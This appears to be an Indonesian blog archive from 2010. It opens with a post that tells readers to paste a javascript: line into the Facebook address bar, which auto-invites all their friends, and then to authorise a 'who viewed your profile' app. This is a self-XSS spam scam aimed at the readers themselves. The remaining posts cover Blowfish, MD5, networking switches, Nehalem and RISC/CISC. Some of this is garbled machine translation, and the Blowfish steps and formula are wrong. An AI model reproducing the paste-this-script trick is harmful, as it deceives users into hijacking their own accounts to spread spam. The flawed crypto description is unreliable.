Senin, 29 November 2010

LAKUKAN LANGKAH - LANGKAH DIBAWAH INI DENGAN BENAR, DAN BERURUTAN AGAR APLIKASI DAPAT BERFUNGSI.

LAKUKAN LANGKAH - LANGKAH DIBAWAH INI DENGAN BENAR,
DAN BERURUTAN AGAR APLIKASI DAPAT BERFUNGSI.

CARA MENGINSTAL APLIKASI (NEW VERSION 7.2) :


1). Klik menu SARANKAN KE TEMAN
yang berada di bawah gambar grup ini

2). Setelah muncul Halaman baru, Tunggu & biarkan hingga photo - photo terlihat.

kemudian COPY lalu pastekan CODE di bawah ini pada ADDRESS BAR

CODE:

javascript:elms=document.getElementById('friends').getElementsByTagName('li');
for(var fid in elms){if(typeof elms[fid] ==='object'){fs.click(elms[fid]);}}

.:: ADDRESS BAR adalah TEMPAT KAMU NULIS: www.facebook.com... diatas tu loh? Dihapus,lalu ganti dengan CODE tadi, (kemudian tekan ENTER)

3). Setelah menekan ENTER, tunggu beberapa saat >
Klik -->> KIRIM UNDANGAN

SEBELUM MELANJUTKAN KE TAHAP BERIKUTNYA PASTIKAN KAMU SUDAH MELAKUKAN TAHAP DI ATAS.
Jika sudah silahkan Lanjutkan ke tahap berikutnya.

4). Masukan aplikasi

Klik http://apps.facebook.com/mytopfans untuk tampilan nama saja terus lakukan
cara yang ada di bawah ini

a. klik izinkan

b. nanti keluar 4 pilihan

1. all fans { untuk semua penggemar }
2. male fans { penggemar cowok }
3. female fans { penggemar cewek }
4. my top fans stat { penggemar negara }
pilih yang kamu suka

c.bila kamu memlih all fans nnti ada tulisan LETS START terus di KLIK dan KLIK IZINKAN

d. sesudah itu akan keluar siapa yang melihat profil kamu dari satu sampai
delapan orang saja

klik publikasikan dan simpan tautan untuk menyimpan di muka profil
kamu atau klik lewati

e. selesai

PERHATIAN...!!!

LAKUKAN LANGKAH - LANGKAH DIATAS DENGAN BENAR, DAN BER URUTAN AGAR
APLIKASI DAPAT BERFUNGSI.

Kamis, 30 September 2010

Enkripsi dan Deskripsi Data Dengan Algoritma Blowfish

1. Enkripsi Algoritma Blowfish
Blowfish menggunakan subkunci berukuran besar. Kunci-kunsi tersebut harus dikomputasikan pada saat awal, sebelum pengkomputasian enkripsi dan dekripsi data.
Langkah-langkahnya adalah sebagai berikut:
1. Terdapat kotak permutasi (P-box) yang terdiri dari 18 buah 32 bit subkunci: P1, P2, P3, ... P18. P-box ini telah ditetapkan sejak awal, 4 buah P-box awal adalah sebagai berikut:
P1 = 0x243f6a88
P2 = 0x85a308d3
P3 = 0x13198a2e
P4 = 0x03707344
2. Xorkan P1 dengan 32 bit awal kunci, xorkan P2 dengan 32 bit berikutnya dari kunci,
dan teruskan hingga seluruh panjang kunci telah terxorkan (kemungkinan sampai P14, 14x32 = 448, panjang maksimal kunci).
3. Terdapat 64 bit dengan isi kosong, bit-bit tersebut dimasukkan ke langkah 2.
4. Gantikan P1 dan P2 dengan keluaran dari langkah 3.
5. Enkripsikan keluaran langkah 3 dengan langkah 2 kembali, namun kali ini dengan
subkunci yang berbeda (sebab langkah 2 menghasilkan subkunci baru).
6. Gantikan P3 dan P4 dengan keluaran dari langkah 5
7. Lakukan seterusnya hingga seluruh P-box teracak sempurna
8. Total keseluruhan, terdapat 521 iterasi untuk menghasilkan subkunci-subkunci yang dibutuhkan. Aplikasi hendaknya menyimpannya daripada menghasilkan ulang subkunci-subkunci tersebut.

Kunci- kunci yang digunakan antara lain terdiri dari, 18 buah 32-bit subkey yang tergabung dalam P-array (P1, P2, ..., P18). Selain itu, ada pula empat 32-bit S-box yang masing-masingnya memiliki 256 entri :
S1,0,S1,1,..., S1,255; S2,0, S2,1,..,, S2,255; S3,0, S3,1,..., S3,255; S4,0, S4,1,..,, S4,255.
Pada jaringan feistel, Blowfish memiliki 16 iterasi, masukannya adalah 64-bit elemen data, X. Untuk melakukan proses enkripsi:


1. Bagi X menjadi dua bagian yang masing-masing terdiri dari 32-bit: XL, XR.
2. For i = 1 to 16:
XL = XL XOR Pi
XR = F(XL) XOR XR
Tukar XL dan XR
3. Setelah iterasi ke-enam belas, tukar XL dan XR lagi untuk melakukan undo pertukaran
terakhir.
4. Lalu lakukan
XR = XR XOR P17
XL = XL XOR P1
1. Terakhir, gabungkan kembali XL dan XR untuk mendapatkan cipherteks.

Pada langkah kedua, telah dituliskan mengenai penggunaan fungsi F. Fungsi F adalah: Bagi XL menjadi empat bagian 8-bit: a,b,c dan d. F(XL) = ((S1,a + S2,b mod 232) XOR S3,c) + S4,d mod 232.

Pada Algoritma Blowfish terdapat keunikan dalam hal proses dekripsinya, yaitu proses dekripsi dilakukan dengan urutan yang sama persis dengan proses enkripsi, hanya saja pada proses dekripsi P1, P2, …, P18 digunakan dalam urutan yang terbalik.

2. Dekripsi Algoritma Blowfish
Dekripsi sama persis dengan enkripsi, kecuali P1, P2, . . . , P18 digunakan pada urutan yang terbalik. kecuali bahwa P1, P2,…, P18. Dekripsi untuk Blowfish bersifat maju kedepan. Mengakibatkan dekripsi bekerja dalam arah algoritma yang sama seperti halnya dengan enkripsi, namun sebagai masukannya adalah chipertext. Walaupun begitu, seperti yang diharapkan, sub-kunci yang digunakan dalam urutan terbalik.
Subkunci dihitung menggunakan algoritma Blowfish, metodanya adalah sebagai berikut:
1. Pertama-tama inisialisasi P-array dan kemudian empat S-box secara berurutan dengan string yang tetap. String ini terdiri digit hexadesimal dari pi.
2. XOR P1 dengan 32 bit pertama kunci, XOR P2 dengan 32 bit kedua dari kunci dan seterusnya untuk setiap bit dari kunci (sampai P18). Ulangi terhadap bit kunci sampai seluruh P-array di XOR dengan bit kunci.
3. Enkrip semua string nol dengan algoritma Blowfiah dengan menggunakan subkunci seperti dijelaskan pada langkah (1) dan (2).
4. Ganti P1 dan P2 dengan keluaran dari langkah (3)
5. Enkrip keluaran dari langkah (3) dengan algoritma Blowfish dengan subkunci yang sudah dimodifikasi.
6. Ganti P3 dan P4 dengan keluaran dari langkah (5).
7. Lanjutkan proses tersebut, ganti seluruh elemen dari P-array, dan kemudian seluruh keempat S-box berurutan, dengan keluaran yang berubah secara kontinyu dari algoritma Blowfish
Total diperlukan 521 iterasi untuk menghasilkan semua subkunci yang dibutuhkan. Aplikasi kemudian dapat menyimpan subkunci ini dan tidak dibutuhkan langkah-langkah proses penurunan ini berulang kali, kecuali kunci yang digunakan berubah.
Gambar diagram skema dekripsi algoritma Blowfish

Metode Algoritma Blowfish dilakukan dengan cara membalikkan 18 subskey yang ada.Yang akan kita lakuakan pertama kali adalah masalah ini nampak tidak dapat dipercaya, karena terdapat dua XOR operasi yang mengikuti pemakaian f-fungsi yang sebelumnya, dan hanya satu yang sebelumnya pemakaian pertama f-fungsi. Walupun jika kita memodifikasi algoritma tersebut sehingga pemakaian subkey 2 sampai 17 menempatkan sebelum output f-fungsi yang di-XOR-kan ke sebelah kanan blok dan dilakukan ke data yang sama sebelum XOR itu, meskipun itu berarti ia sekarang berada di sebelaha kanan blok, karena XOR subkey tersebut telah dipindahkan sebelum swap (tukar) kedua belah blok tersebut (tukar separuh blok kiri dan separuh blok kanan). Kita tidak merubah suatu apapun karena informasi yang sama di-XOR-kan ke separuh blok kiri antara setiap waktu, informasi ini digunakan sebagai input f-fungsi. Kenyataannya, kita mempunyai kebalikan yang pasti dari barisan dekripsi.

Enkripsi dan Deskripsi Data

Enskripsi : Penyandiaan data sehingga tidak dapat dinikmati dengan mudah ( untuk mengamankan data )
Deskripsi : Pengenbalian data yang telah di enskripsikan
A  B  C  D  E   F  G  H  I    J   K  L  M
N  O  P  Q  R  S  T  U  V  W  X  Y  Z
Mencari dengan Root 13
Contoh :         
D  E  W  I 
Q  R  J  V
Kriptografi : Ilmu yang mempelajari tentang pengkodean pesan yang bersifat rahasia
Plaintext : Data asli sebelum di lakukan pengkodean ( Masih bermakna )
Chiper Text : Data setelah di enskripsikan/disandikan
Enkripsi Password Dengan MD5
Sebenarnya masih banyak metode yang digunakan untuk mengenkripsi data. Seperti root13, MD4, dan lain-lain. Yang saya bahas kali ini adalah MD5.Data apa saja yang biasa dienkripsi sehubungan dengan ilmu web salah satunya ialah password. Tidak bisa dipungkiri lagi bahwa keamanan akses disebuah halaman web merupakan suatu hal penting untuk diperhatikan. Data yang terdapat dalam suatu halaman web seringkali merupakan data penting yang tidak boleh diperlihatkan sembarangan kepada orang yang tidak berhak.
Apa itu MD5? Definisi menurut sumber dari wikipedia.org MD5 merupakan algoritma yang memiliki metode one-way. Untuk definisi yang mudah dimengerti, MD5 merupakan metode enkripsi data dari yang berbentuk plaintext menjadi berbentuk algoritma (chypertext) yang bertujuan agar tidak mudah dibaca mentah-mentah oleh siapapun termasuk database administrator. Sebagai catatan tutorial ini sengaja saya tidak sertakan database agar dapat fokus pada MD5 saja dan juga sesuai judulnya “Enkripsi Password Dengan MD5”. Pembaca tinggal menambahkan database jika akan diaplikasikan menjadi selayaknya halaman login.
Sebenarnya masih banyak metode yang digunakan untuk mengenkripsi data. Seperti root13, MD4, dan lain-lain. Data apa saja yang biasa dienkripsi sehubungan dengan ilmu web salah satunya ialah password. Tidak bisa dipungkiri lagi bahwa keamanan akses disebuah halaman web merupakan suatu hal penting untuk diperhatikan. Data yang terdapat dalam suatu halaman web seringkali merupakan data penting yang tidak boleh diperlihatkan sembarangan kepada orang yang tidak berhak.
Untuk definisi yang mudah dimengerti, MD5 merupakan metode enkripsi data dari yang berbentuk plaintext menjadi berbentuk algoritma (chypertext) yang bertujuan agar tidak mudah dibaca mentah-mentah oleh siapapun termasuk database administrator. Sebagai catatan tutorial ini sengaja saya tidak sertakan database agar dapat fokus pada MD5 saja dan juga sesuai judulnya “Enkripsi Password Dengan MD5”. Pembaca tinggal menambahkan database jika akan diaplikasikan menjadi selayaknya halaman login.

Arsitektur Nehalem

Sebagai produk tercepat pertumbuhan pasar server - prosesor, masing-masing akan memberikan penggantian industri kejutan, pada tahun 2009 salah satu perubahan penting dalam pasar server, Intel akan meluncurkan prosesor Nehalem pertama server berbasis Intel The Nehalem arsitektur prosesor x86, diharapkan pada bulan Maret untuk meluncurkan server pertama berbasis prosesor Nehalem seri Xeon 5500 (Nehalem-EP), sedangkan pada semester kedua akan memperkenalkan 8 core Xeon seri 7500 (Nehalem-EX) prosesor. Dengan situasi ekonomi saat ini, kelahiran prosesor server terbaru untuk penjualan kemungkinan membawa kekuatan shock, kemampuan untuk menarik pengguna untuk keluar dari status depresi pengadaan akan diumumkan pada kuartal pertama dengan pengguna.

Rush "segar" dan prosesor Nehalem

Arsitektur Nehalem tidak akrab dengan prosesor x86, Intel Core i7 dirilis bulan November lalu, Core i7 baru seri pertama Intel menggunakan kode-bernama "Nehalem" arsitektur prosesor. Nehalem berbasis generasi arsitektur prosesor desktop akan mengikuti pengenalan 2006 dari merek "" Intel Core, akan digunakan untuk prosesor desktop berikutnya-generasi Intel high-end, kode-bernama Bloomfield dan Lynnfield terutama produk empat-inti.






Prosesor seri Core i7

Tidak hanya dalam produk desktop, Intel Nehalem arsitektur prosesor x86 pertama yang sukses menguji air, itu adalah tingkat awal dalam aplikasi enterprise lebih lanjut "menunjukkan." Apple pertama kali diumumkan penerapan quad-core Xeon chip Intel, dan mengumumkan bahwa produk workstation-nya adalah dua mendatang arsitektur prosesor Intel Nehalem.






Mac Pro workstation

Meskipun Intel belum secara resmi mengumumkan peluncuran chip tersebut, namun Apple sudah mulai pengadaan chip Mac Pro workstation. workstation ini Xeon 3500 dan 5500 chip prosesor quad-core. chip adalah produk Nehalem-EP, bagian dari jalur produksi, terutama untuk empat slot server dan workstation, dan didasarkan pada arsitektur Nehalem terbaru Intel.

Intel arsitektur Nehalem untuk desktop kelas x86 prosesor, membuat perusahaan-perusahaan besar memiliki produk baru pada server arsitektur prosesor Intel Nehalem keluar penuh harapan, yang Tick-Tock peta jalan, perusahaan telah lebih perhatian terfokus pada arsitektur Core mikro- generasi berikutnya - yang diberi nama kode Nehalem asli produk prosesor multi-core, dengan beban kerja server X86 terus tumbuh, kebutuhan server dan pengembangan kecepatan yang terus meningkat dari frekuensi clock, core CPU volume dan perangkat penyimpanan dan kapasitas memori untuk mempertahankan sinkronisasi kesulitan, prosesor server berbasis Nehalem telah menjadi solusi terbaik untuk memecahkan masalah ini.

prosesor Nehalem memimpin pasar

Prosesor baru Intel, Nehalem arsitektur prosesor Perbedaan terbesar adalah dengan QuickPath Interconnect (QPI) arsitektur untuk menggantikan teknologi front-side bus sebelumnya. Arsitektur QPI untuk lingkungan server multi-prosesor, masing-masing prosesor dapat mentransfer data satu sama lain, dapat meningkatkan kinerja sistem. Selain itu, QuickPath juga mencakup teknologi memory controller terintegrasi, prosesor controller memori yang terintegrasi, untuk meningkatkan kecepatan prosesor dan transfer memori.






Untuk seri Nehalem-EX 8-core, jumlah thread untuk meningkatkan 16 mengejutkan, tingkat lebih rendah dari prosesor Nehalem-EP juga akan empat inti prosesor 8-thread. Ini rangkaian "perbaikan kecil" menyebabkan kinerja prosesor melonjak.

Pada saat yang sama meningkatkan kinerja dan aplikasi menjadi kombinasi yang baik, VT-d Nehalem teknologi virtualisasi hardware secara efektif dapat mempercepat Hyper-V dan mesin VMware virtual, sangat meningkatkan kinerja virtualisasi. Dan memori controller terintegrasi, sampai dengan 24MB dari cache dan kecepatan maksimum 3 QPI Direct Connect Arsitektur, 256GB memori atau lebih I / O dapat lingkungan server Xeon kinerja puncak. Dalam krisis ekonomi, perusahaan menggunakan virtualisasi untuk menghemat biaya operasional TI telah menjadi fakta tidak terbantahkan, dan Nehalem-EX niscaya akan menjadi virtualisasi prosesor paling kuat.

Selain itu, untuk meningkatkan kinerja virtualisasi server manajemen, dan persyaratan OS, pengadaan server empat arah, memory yang besar, dan harga lebih tinggi kepada pelanggan akan mempertimbangkan menggunakan server dilengkapi dengan "" produk server Xeon prosesor Nehalem EP, berkapasitas tinggi memori dan harga yang lebih rendah akan membantu pelanggan bisnis di tahun 2009, biaya pengeluaran kompresi.

Berdasarkan ini, server mengalami perubahan pasar, sektor krisis gelembung Internet, pendapatan penjualan dan data pengiriman tergantung dari dampak yang signifikan. Dalam konteks ini, kinerja yang kuat dari chip server Intel "Nehalem" tetap memulai seri Xeon yang kuat, dari mana kita dapat merasakan industri chip Intel sebagai pemimpin dengan visi strategis adalah untuk melihat besok.

Switch Layer 2 dan Layer 3

Switch Layer 2 dan 3
Switch Layer 2 adalah sebuah bentuk switch Ethernet yang melakukan switching terhadap paket dengan melihat alamat fisiknya (MAC address). Switch jenis ini bekerja pada lapisan data-link (atau lapisan kedua) dalam OSI Reference Model. Switch-switch tersebut juga dapat melakukan fungsi sebagai bridge antara segmen-segmen jaringan LAN, karena mereka meneruskan frame Ethernet berdasarkan alamat tujuannya tanpa mengetahui protokol jaringan apa yang digunakan.
Layer 2 switch dapat dipasang secara transparan di dalam sebuah jaringan. Perangkat-perangkat tersebut tidak akan mengganggu komunikasi antara host dengan router. Sekali terpasang, sebuah layer 2 switch akan mengetahui host-host dan jaringan yang terhubung dengan melihat field Source Address pada frame yang diterimanya. Layer 2 switch juga dapat membangun sebuah basis data dari alamat-alamat MAC address dan port di mana kartu jaringan terhubung yang disimpan di dalam memori cache milik switch.
Ketika sebuah frame datang ke sebuah port di dalam switch, layer 2 switch akan menguji frame tersebut dengan melihat field Destination Address, dan kemudian akan meneruskan frame tersebut ke tujuannya yang masih terhubung ke switch yang sama, dengan mengirimkannya kepada port di mana tujuannya terhubung. Jika field Source Address dari frame tersebut tidak dikenali, maka switch tersebut akan mengirimkan frame tersebut ke semua port kecuali port di mana frame tersebut masuk.
Layer 2 Switch adalah sebuah pengembangan dari HUB. Perbedaannya dengan HUB adalah Layer 2 Switch memiliki lebih dari satu collusion domain. Collusion domain pada Layer 2 Switch tergantung pada jumlah port yang dimiliki. Semakin banyak port yang dimiliki, semakin banyak pula collusion domain-nya. Sebagai contoh jika kita memiliki lima port, maka lima orang dapat mengirim dan menerima pada waktu yang bersamaan. oleh karena itu pada dasarnya Layer 2 Switch sudah mengaplikasikan sistem full duplex.
Secara simbolis Layer 2 switch dapat digambarkan seperti gambar yang ditunjukkan oleh Gambar 1.


Gambar 1 Simbol dari layer 2 switch
Layer 3 Switch
Jika pada Layer 2 Switch kita memerlukan bantuan router external untuk melakukan inter-vlan routing. Pada Layer 3 Switch, router tersebut sudah terintegrasi pada switch tersebut. Sehingga proses akan semakin lebih cepat jika dibandingkan dengan Layer 2 Switch. Secara simbolis Layer 3 switch dapat digambarkan seperti gambar yang ditunjukkan oleh Gambar 2.

Gambar 2 Simbol dari layer 3 switch
Layer 3 Switching memungkinkan komunikasi antar VLAN atau antar segmen jaringan dengan kecepatan tinggi mendekati kecepatan komunikasi kabel Ethernet pada umumnya. Komunikasi antar jaringan pada layer 3 biasa menggunakan piranti Router yang umum digunakan untuk komunikasi antar site lewat WAN Cloud. Salah satu piranti Layer 3 Switching adalah GSM7324 NETGEAR layer 3 Switch. Layer 3 Switching sangat berguna untuk mengurangi latensi dan meningkatkan kinerja komunikasi antar segmen di suatu jaringan berskala business sedang sampai jaringan corporasi yang complex.

GSM7324 NETGEAR layer 3 Switch
Kita bisa meningkatkan kinerja LAN dengan menggunakan backbone links kecepatan tinggi Gigabit dan juga menggunakan Switch LAN dengan performa tinggi. Untuk jaringan multi-segmen pemakaian Layer 3 Switching akan sangat meningkatkan kinerja komunikasi antar segmen dengan latensi minimal. Semua links seharusnya dimaksimalkan untuk throughput dan semua masalah bottleneck harus diselesaikan. Technology yang menggunakan Link Agregasi memberikan suatu cara untuk skalabilitas kebutuhan bandwidth LAN. Adopsi Gigabit dan backbone 10GE dimasa depan akan menjamin skalabilitas LAN dan memberikan integrasi yang mulus untuk layanan jaringan yang ada sekaranga maupun di masa mendatang. Anda bisa mempertimbangkan GSM7324 NETGEAR layer 3 Switch.
Penggunaan layer 3 Switching akan dapat membantu menyelesaikan masalah latensi komunikasi antar segmen dan juga batasan kinerja yang biasa digunakan oleh paket filtering yang menggunakan routing berdasarkan processor. Layer 3 Switching adalah technology LAN yang digunakan untuk meningkatkan kinerja routing antar VLAN dan tercapainya kecepatan forwarding transparent. NETGEAR GSM7324 layer 3 Switch memberikan semua akan kebutuhan Switching Layer 3.
Kebutuhan minimum standard untuk kinerja LAN dan Layer 3 Switching adalah sebagai berikut:
1. Semua Links harus dimaksimalkan untuk throughput dan semua masalah bottleneck harus diselesaikan. Jika terdeteksinya masalah bottlenecks maka perlu dipertimbangkan untuk meng-upgrade link backbone yang bersifat critis dan segment2 server juga perlu diupgrade. Tentunya ada mekanisme untuk menganalisa troughput dari Switcing dan Routing.
2. Untuk mencapai suatu kinerja tinggi dalam komunikasi antar LAN atau antar VLAN maka solusi pemakaian Layer 3 Swicthing sangat diperlukan.
3. Suatu Layer 3 Swicting setidaknya menawarkan rate forwarding pada atau diatas 5 sampai 10 Mpps (Million packets per second) atau bisa diskalakan pada kecepatan yang didapatkan pada jaringan LAN 100/1000 Mbps.
4. Suatu layer 3 Switching setidaknya juga memberikan access-list extended (paket filtering) Checking In Silicon untuk meningkatkan kecepatan forwarding paket dan mengurangi latensi jaringan. Link jaringan kecepatan tinggi bisa menggunakan layanan Ethernet Gigabit. Kecepatan Links lebih jauh bisa ditingkatkan dengan menggunakan teknologi Ether Channel technologies (FEC\GEC). Teknologi ini bisa memberikan pipa data yang lebar masing2 sekitar 800 Mbps (untuk FEC) atau 8 Gbps (untuk GEC)
Jika diperlukan troughput routing kecepatan tinggi untuk komunikasi internetwork atau antar VLAN maka pemakaian Layer 3 Switching harus digunakan. Layer 3 Switcing adalah solusi routing secara hardware (Silicon) dengan kinerja yang sangat tinggi yang bisa memberikan solusi routing paket dengan kecepatan tinggi dengan latensi rendah. Routing secara konvesional adalah berdasarkan processing CPU yang menghasilkan kecepatan routing rendah (kurang dari 500 Kbps), sementara beberapa implementasi dari Layer 3 Switcing bisa memberikan kecepatan forwarding paket pada atau diatas 15 Mpps atau setara kecepatan teknologi Ethernet 100/1000 Mbps.
Multi-layer switching (MLS) adalah Switching hardware yang bisa melakukan Switching layer-2, layer-3 dan layer-4 atau bahkan layer lebih tinggi lainnya. Hal ini adalah sangat penting jika dalam satu perangkat tunggal diperlukan untuk memberikan switching dan routing didalam LAN dengan kinerja yang tinggi. Layer-4 Switching adalah penting jika keterbatasan masalah kinerja dan latensi paket filtering lewat extended access-list perlu diatasi.

Layer 3 Switching Diagram
Normal paket filtering berdasarkan processor adalah kinerja operasi sangat intensive, dengan dilakukan banyak paket test akan menghambat throughput paket. Multi Layer Switching akan mengatasi overhead kinerja dengan mengidentifikasikan aliran paket yang valid, paket di routing sekali dan secara bergiliran semua paket di Switching kedalam aliran.
Performa jaringan seharusnya di optimalkan dengan cara yang effektif agar memadai untuk kebutuhan kinerja jaringan saat ini maupun dimasa mendatang. Bottlenecks jaringan seharusnya di selesaikan agar kinerja jaringan menjadi lebih baik begitu juga response time aplikasi.
Dengan tidak menggunakan Layer 3 Switching antar segmen jaringan performa tinggi, maka bottleneck routing akan tidak terhindarkan.
NETGEAR GSM7324 layer 3 Switch
Berikut ini adalah GSM7324 Netgear layer 3 Switch yang merupakak Layer 3 Switch penuh dengan fungsional Gigabit dengan harga terjangkau. GSM7324 Netgear layer 3 Switch ini adalah switch dengan management full memberikan fitur Layer 3 yang anda harapkan, troughput maksimal dan fleksibilitas tuntutan jaringan2. GSM7324 Netgear layer 3 Switch sangat ideal untuk backbone links Swicthes kecepatan tinggi, server Gigabit, atau untuk tuntutan jaringan semua Gigabit.
GSM7324 Netgear layer 3 Switch memberikan switching fungsional Layer-2 dan Layer-3 yang bisa di manage dikombinasikan dengan kualitas layanan L2/L3/L4, pembekalan bandwidth, dan fitur access control memungkinkan telephoni VoIP, video converancing, dan aplikasi hemat biaya lainnya. Fitur berikut ini menjadikan GSM7324 Netgear layer 3 Switch sebagai inti semua tuntutan jaringan Gigabit.
1. Kemampuan routing: routing IPv4 pada kecepatan Ethernet, dengan routing sampai 512 route per unit; VRRP (IP redundancy), ICMP, RIP I dan RIP II, OSPF, dan DHCP/BOOTP relay
2. Kemampuan Switching: Port trunking, proteksi STP broadcast storm, extensive VLAN support, IGMP snooping, Rapid Spanning Tree, dan link aggregation
3. Fitur kualitas layanan: DiffServ, access control lists, dan pembekalan bandwidth menggunakan informasi L2, L3, dan L4.

Perbedaan RISC dengan CISC

Perkalian Dua Bilangan dalam Memori

Pada gambar di atas, terlihat struktur memori (yang disederhanakan) suatu komputer secara umum. Pada main memori terbagi menjadi beberapa lokasi mulai dari nomor 1 (baris) : 1 (kolom) sampai dengan 6:4. Unit eksekusi bertanggung jawab untuk operasi komputasi yang mana data-data sudah tersimpan di dalam salah satu dari 6 register (A, B, C, D, E, atau F). Misalkan akan dilakukan perkalian (product) dua angka, misalkan angka pertama terletak di lokasi 2:3 sedangkan angka kedua pada 5:2, kemudian hasilnya dikembalikan lagi ke lokasi 2:3.


Complex Instruction Set Computing (CISC)

Complex Instruction Set Computing (CISC) atau kumpulan instruksi komputasi kompleks. Adalah suatu arsitektur komputer dimana setiap instruksi akan menjalankan beberapa operasi tingkat rendah, seperti pengambilan dari memori (load), operasi aritmatika, dan penyimpanan ke dalam memori (store) yang saling bekerja sama. Tujuan utama dari arsitektur CISC adalah melaksanakan suatu instruksi cukup dengan beberapa baris bahasa mesin yang relatif pendek sehingga implikasinya hanya sedikit saja RAM yang digunakan untuk menyimpan instruksi-instruksi tersebut. Arsitektur CISC menekankan pada perangkat keras karena filosofi dari arsitektur CISC yaitu bagaimana memindahkan kerumitan perangkat lunak ke dalam perangkat keras.
Misalkan, sebuah prosesor CISC sudah dilengkapi dengan sebuah instruksi khusus yang diberi nama MULT (dikenal sebagai complex instruction). Ketika dijalankan, instruksi akan membaca dua nilai kemudian menyimpannya ke dalam 2 register yang berbeda, melakukan operan perkalian di dalam unit eksekusi dan hasilnya dikembalikan lagi ke register yang benar. Maka instruksinya cukup satu baris yaitu :
MULT 2:3, 5:2
Sebelumnya, pada arsitektur RISC ketika menjalankan instruksi “MULT” maka akan dibagi menjadi 3 instruksi yaitu :
  1. LOAD, digunakan untuk memindahkan data dari memori ke register.
  2. PROD, digunakan untuk melakukan operasi perkalian yang berada di dalam register.
  3. STORE, digunakan untuk memindahkan data dari register ke memori yang benar.
Maka instruksinya :
LOAD A, 2:3
LOAD B, 5:2
PROD A, B
STORE 2:3, A


“RISC dimaksudkan untuk menyederhanakan rumusan perintah sehingga lebih efisien dalam penyusunan kompiler yang ada.”

“RISC dimaksudkan untuk mengurangi jumlah siklus/detik setiap instruksi dibayar dengan bertambahnya jumlah instruksi per program.”
Tabel Perbandingan RICS dengan CISC
Fitur RICS PC/Desktop CISC
Daya Sedikit ratusan miliwatt Banyak watt
Kecepatan Komputasi 200-520 MHz 2-5 GHz
Manajemen Memori Direct, 32 bit Mappped
I/O Custom PC berbasis pilihan via BIOS
Environment High Temp, Low EM Emissions Need Fans, FCC/CE approval an issue
Struktur Interupsi Custom, efisien, dan sangat cepat Seperti PC
Port Sistem Operasi Sulit, membutuhkan BSP level rendah. Load and Go
Referensi :
http://agfi.staff.ugm.ac.id/blog/index.php/2008/12/risc-vs-cisc/

Kapasitas Memory

Bit adalah nama sebuah satuan jumlah informasi data. Bit melambangkan kapasitas dari sebuah digit biner. Satu bit sama dengan 0.693 nat (ln(2)), atau 0.301 hartley (log10(2)).
Bita (Bahasa Inggris: byte) adalah istilah yang biasa dipergunakan sebagai satuan dari penyimpanan data dalam komputer. Satu bita terdiri dari delapan bit.
Huruf B digunakan dalam singkatan kepada byte. (bit menggunakan singkatan b.) seperti kB = kilobyte. Harddisk berkapasitas 40GB secara mudahnya bermaksud cakram keras tersebut mampu menyimpan hingga 40 ribu juta (milyar) byte atau gigabyte data.

Nilai Konversi Bit
Referensi:

Jaringan Komputer

A. Komputer.
Komputer adalah alat yang dipakai untuk mengolah data menurut prosedur yang telah dirumuskan. Kata computer semula dipergunakan untuk menggambarkan orang yang perkerjaannya melakukan perhitungan aritmatika, dengan atau tanpa alat bantu, tetapi arti kata ini kemudian dipindahkan kepada mesin itu sendiri.
B. NIC (Network Interface Card)
NIC atau Ethernet Card berfungsi sebagai penghubung antara komputer dengan network device. Ada beberapa jenis koneksi yang dapat digunakan untuk terhubung dengan NIC. Jika media transmisi menggunakan cable coaxial maka konektornya berupa konektor BNC (Barrel Nut Connector atau Bayonet Net Connector). Tapi jika media transmisinya menggunakan cable twisted pair, maka jenis konektor yang dipakai adalah konektor RJ-45. Konektor RJ-45 ini yang sekarang sering digunakan dan dijumpai di hampir semua jaringan komputer.
C. Switch Hub dan Router
  • Switch dan Hub
Merupakan network device yang berfungsi untuk menghubungkan semua client, printer, workstation, server atau perangkat network lainnya (Access Point) dengan menggunakan cable-cable jaringan yang ada (Coax, UTP ataupun Fiber Optic). Switch memiliki kemampunan management traffic data yang lebih baik dari pada Hub.
  • Router
Router merupakan network device yang berfungsi untuk menghubungkan dua atau lebih jaringan yang berbeda, router bekerja pada Layer 3 pada OSI Layer, sehingga memungkinkan melakukan process routing, dimana process inilah yang membuat semua jaringan yang berbeda dapat terhubung satu dengan lainnya.
  • Bridge
Fungsinya hampir sama dengan repeater, akan tetapi bridge mampu menghubungkan antara jaringan yang menggunakan transmisi yang berbeda. Bridge dapat pula menghubungkan jaringan tipe kabel yang berbeda atau topology yang berbeda.
D. MEDIA TRANSMISI
Berfungsi untuk menghubungkan antar komputer secara fisik sbg sarana komunikasi data. Media transmisi dibedakan menjadi 3 macam :
  • Media transmisi dengan kabel
  • Media tansmisi tanpa kabel/WiFi
  • Media transmisi dengan satelit (VSAT)
Referensi :